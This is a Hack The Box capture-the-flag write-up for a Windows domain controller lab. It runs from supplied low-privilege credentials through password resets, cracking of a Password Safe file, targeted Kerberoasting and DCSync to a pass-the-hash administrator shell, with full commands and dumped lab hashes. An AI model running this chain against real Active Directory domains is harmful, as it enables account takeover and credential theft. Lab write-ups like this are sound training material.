Administrator Windows (Medium)

Administrator is a medium-difficulty Windows machine designed around a complete domain compromise scenario, where credentials for a low-privileged user are provided.

This machine was given in a asume breach sceanrio the credentials were provided for the user Olivia

Olivia : ichliebedich

Nmap scan

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-07 14:58:55Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-07T14:59:09
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

Since SMB was available i checked what were the available shares

┌─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $nxc smb 10.129.40.50 -u 'Olivia' -p 'ichliebedich' --shares
SMB         10.129.40.50    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.40.50    445    DC               [+] administrator.htb\\Olivia:ichliebedich 
SMB         10.129.40.50    445    DC               [*] Enumerated shares
SMB         10.129.40.50    445    DC               Share           Permissions     Remark
SMB         10.129.40.50    445    DC               -----           -----------     ------
SMB         10.129.40.50    445    DC               ADMIN$                          Remote Admin
SMB         10.129.40.50    445    DC               C$                              Default share
SMB         10.129.40.50    445    DC               IPC$            READ            Remote IPC
SMB         10.129.40.50    445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.40.50    445    DC               SYSVOL          READ            Logon server share

These were almost the default shares so i checked if i can access through winrm

┌─[✗]─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $nxc winrm 10.129.40.50 -u 'Olivia' -p 'ichliebedich' 
WINRM       10.129.40.50    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.40.50    5985   DC               [+] administrator.htb\\Olivia:ichliebedich (Pwn3d!)

Ran a bloodhound enum

┌─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $bloodhound-python -ns 10.129.40.50 -d administrator.htb -c all -u olivia -p ichliebedich --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 26S
INFO: Compressing output into 20250107152808_bloodhound.zip

In the bloodhound we saw that olivia has genericall permissions for michael so we changes his password and got access

┌─[✗]─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $net rpc password michael kulindu2005 -U administrator.htb/Olivia%'ichliebedich' -S 10.129.40.50

Then we saw that michael has ForceChangePassword over Benjamin

┌─[✗]─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $net rpc password benjamin kulindu2005 -U "administrator.htb"/"michael"%"kulindu2005" -S 10.129.40.50

I tried to winrm i dint have access so since there was ftp running aswell in the beggining i checked if i could access that

┌─[✗]─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $nxc ftp 10.129.40.50 -u benjamin -p '123456789'
FTP         10.129.40.50    21     10.129.40.50     [*] Banner: Microsoft FTP Service
FTP         10.129.40.50    21     10.129.40.50     [+] benjamin:123456789

┌─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $ftp [email protected]
Connected to 10.129.40.50.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ;s
?Invalid command.
ftp> ls
229 Entering Extended Passive Mode (|||64481|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||64495|)
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************************************************************************************************************************************|   952        5.96 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (3.92 KiB/s)
ftp> 
ftp> exit

Got a file tried to crack it through hashcat

─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $hashcat -m 5200 Backup.psafe3 -a 0 /usr/share/wordlists/rockyou.txt

Backup.psafe3:tekieromucho

With the cracked password i downloaded and installed safepass and opened the file where i was given a few passwords

emily : UXLCI5iETUsIBoFVTj8yQFKoHjXmb
alexander : UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emma : WwANQWnmJnGV07WQN8bMS7FMAbjNur

I try all passwords and get a hit for emilys

┌─[✗]─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $evil-winrm -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -i 10.129.40.50
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\emily\\Documents>

I check how emily can priv esc and i saw she has GenericWrite over ethan

Im going to run a Kerberoast as emily and this is what i got

(venv) ┌─[therealslimshady@parrot]─[~/Documents/Tools/targetedKerberoast]
└──╼ $sudo ntpdate 10.129.40.50 |sudo python3 targetedKerberoast.py -v -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$35554496379b37def04ccd68518026b1$f157748fa4788e7fcba5543e8dbcfabe33df4a7c8ac242bf50648899149a7c601e6eb1b546702d6d6006cfc4559e5fcd1c231e303b6d98bd7d137acf273ce83dcf006d78d7a2825cf39ebe2b21de7a55e3dc85eb83a238c0f3147aef5d54264548572155eddfde55d7e3bc36c93585c18da1f3de8ee8e50e6526cce45792e41a2e55c232cfd58f8025ff0113fdb676084355cbb02ec3607bff2466cabf8e115e016c1859d9ab7916d0c7c02a7d79725721bfefbe6fdfad0bdf15a64304fe248e864494a8a10baea478a64a385275efdd61eed7dcc65c2aa53302d244fc0b23990d4bee12f9ad398c20f6744fb0cc5db0cc9127a65188a52caade9a272a52f9ab01bb14a1f28f54d6357952c9a8cf4acb54cace73da1eeaaa5bff6166703ac82e3c5ba04fa58d61d0cdf78900fc6045209c4cc924d8deda77b0f7986e7d6ec7b6ac067712338c33a8f9936a7e51962557c1e9884a447c87342e40ce7f149702b8fb8f9a8830203f0f03ede50342d263861d2d00785e57cac78fdfd41173dc34a3e9d4e7efe84a1b4daea428bf59518680b439416c8a6deb657e7a121f6eb475f2a5577f85923946ce22c05d0c76ee02c41bba21f8302f9e53ed172e39cfbf885ea2c46681f3ac581de9de63b2b88acbf850f09ae641b9e18d2802fed9cd2f65d25c97e717f59cf09590c8f6be932c36f654d087e4e49c9238a72d9a53196f5ba6a3b7e39f3fe5dcecd6196eaf4be8fa9f95f6742d2fe08052a32ade891001c8a820dac7591f6d413ba54b40b23574ff5554e30a8a1ac08a9e26e3dc5bf107c4bfb76f1f1b03f3cbcc3a73f0bbf19b005ba109e51c66f44970cf33ec410f446529f030e42d7ae43902b52c6993fe3630eaf58d6b39897ff8140022ffe2bf2fcd777f68c3f526baeaff5b8bb63ec24667558ec68362f932d1c114a4f8bf4194f07631053872fede1770e71291160e7e5b74104924162a3efbd5f6541d23a4a3608a032f28b3ba9682413a26b30348329a819c18ac554ad705a746f8ab1e342efcb94083d62260cec83e0e80c9d319b191089abfd17508d23e0b9f90d28837c3d30a3d11fa86a399cfb8bdfe5f084ee6a0a97bfa83feb682d7451107e03b925cf96981868e76793852c6b71954c72c03aca0db08d93c4a1f346790fabb82e208ec696d49b30d5e9ae15e62bf5969dfab923fcc931f39aa64d2f41b8820bff2e9a871571f96a30fd475eca3aba7ea779ad271d7f1a4c9b0be31271def660e1a7df1f2329ef3234083cb8fbe4fa9a3c3833f17b982885c1b541c2781bfdaef230a054c7a734a2c75e836782f7bee117f805446fcea30003270dbfa4dcdafdf1fb9e57025ef154315911574f80808743183bac44e205ca8f16a2d893c377d05c4c48a250fc8fdbf535492c0f64255d0237f0bb0ff68b2411cd81d7231ab90fcfe34088f43ff6e67f89e513c8b8e39b8b78e06c87e8ae63739c6b41ea708bfb28b885dc27f7a7e44f1ff543ec737e6e6832e9b811d04246d63172bee35f52a5a05ad68
[VERBOSE] SPN removed successfully for (ethan)

┌─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $hashcat ethan_hash /usr/share/wordlists/rockyou.txt 

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$35554496379b37def04ccd68518026b1$f157748fa4788e7fcba5543e8dbcfabe33df4a7c8ac242bf50648899149a7c601e6eb1b546702d6d6006cfc4559e5fcd1c231e303b6d98bd7d137acf273ce83dcf006d78d7a2825cf39ebe2b21de7a55e3dc85eb83a238c0f3147aef5d54264548572155eddfde55d7e3bc36c93585c18da1f3de8ee8e50e6526cce45792e41a2e55c232cfd58f8025ff0113fdb676084355cbb02ec3607bff2466cabf8e115e016c1859d9ab7916d0c7c02a7d79725721bfefbe6fdfad0bdf15a64304fe248e864494a8a10baea478a64a385275efdd61eed7dcc65c2aa53302d244fc0b23990d4bee12f9ad398c20f6744fb0cc5db0cc9127a65188a52caade9a272a52f9ab01bb14a1f28f54d6357952c9a8cf4acb54cace73da1eeaaa5bff6166703ac82e3c5ba04fa58d61d0cdf78900fc6045209c4cc924d8deda77b0f7986e7d6ec7b6ac067712338c33a8f9936a7e51962557c1e9884a447c87342e40ce7f149702b8fb8f9a8830203f0f03ede50342d263861d2d00785e57cac78fdfd41173dc34a3e9d4e7efe84a1b4daea428bf59518680b439416c8a6deb657e7a121f6eb475f2a5577f85923946ce22c05d0c76ee02c41bba21f8302f9e53ed172e39cfbf885ea2c46681f3ac581de9de63b2b88acbf850f09ae641b9e18d2802fed9cd2f65d25c97e717f59cf09590c8f6be932c36f654d087e4e49c9238a72d9a53196f5ba6a3b7e39f3fe5dcecd6196eaf4be8fa9f95f6742d2fe08052a32ade891001c8a820dac7591f6d413ba54b40b23574ff5554e30a8a1ac08a9e26e3dc5bf107c4bfb76f1f1b03f3cbcc3a73f0bbf19b005ba109e51c66f44970cf33ec410f446529f030e42d7ae43902b52c6993fe3630eaf58d6b39897ff8140022ffe2bf2fcd777f68c3f526baeaff5b8bb63ec24667558ec68362f932d1c114a4f8bf4194f07631053872fede1770e71291160e7e5b74104924162a3efbd5f6541d23a4a3608a032f28b3ba9682413a26b30348329a819c18ac554ad705a746f8ab1e342efcb94083d62260cec83e0e80c9d319b191089abfd17508d23e0b9f90d28837c3d30a3d11fa86a399cfb8bdfe5f084ee6a0a97bfa83feb682d7451107e03b925cf96981868e76793852c6b71954c72c03aca0db08d93c4a1f346790fabb82e208ec696d49b30d5e9ae15e62bf5969dfab923fcc931f39aa64d2f41b8820bff2e9a871571f96a30fd475eca3aba7ea779ad271d7f1a4c9b0be31271def660e1a7df1f2329ef3234083cb8fbe4fa9a3c3833f17b982885c1b541c2781bfdaef230a054c7a734a2c75e836782f7bee117f805446fcea30003270dbfa4dcdafdf1fb9e57025ef154315911574f80808743183bac44e205ca8f16a2d893c377d05c4c48a250fc8fdbf535492c0f64255d0237f0bb0ff68b2411cd81d7231ab90fcfe34088f43ff6e67f89e513c8b8e39b8b78e06c87e8ae63739c6b41ea708bfb28b885dc27f7a7e44f1ff543ec737e6e6832e9b811d04246d63172bee35f52a5a05ad68:limpbizkit

So new creds are

ethan : limpbizkit

I can do a dcsync with ethan to get administrator so i run secrets dump and with that i can get the admin hash

┌─[✗]─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $impacket-secretsdump administrator.htb/ethan:[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\\michael:1109:aad3b435b51404eeaad3b435b51404ee:049b73446cf06c1c5c25b52c7b6b5f02:::
administrator.htb\\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
administrator.htb\\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\\michael:aes256-cts-hmac-sha1-96:f66b0baac32e4b849cc521ea64dc8eaceba8f3a68013d36abc9f251a55e1ad91
administrator.htb\\michael:aes128-cts-hmac-sha1-96:b81919c404bd1a2223fc6db7aeece371
administrator.htb\\michael:des-cbc-md5:4f9b0dd0a1615452
administrator.htb\\benjamin:aes256-cts-hmac-sha1-96:d165908df31319ffa77bf36f266a282b2d1d27993c172f99520b8aafb1054dba
administrator.htb\\benjamin:aes128-cts-hmac-sha1-96:bb9772d591318531014cd71c86fb6cb6
administrator.htb\\benjamin:des-cbc-md5:5794e3a26dea34df
administrator.htb\\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...

Tester gained Administraive access via a Pass The Hash

┌─[therealslimshady@parrot]─[~/Documents/HTB/Administrator]
└──╼ $evil-winrm -u Administrator -i administrator.htb -H 3dc553ce4b9fd20bd016e098d2d2fd2e
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents>

PreviousRed Team Blogs NextPage 2

Last updated 1 day ago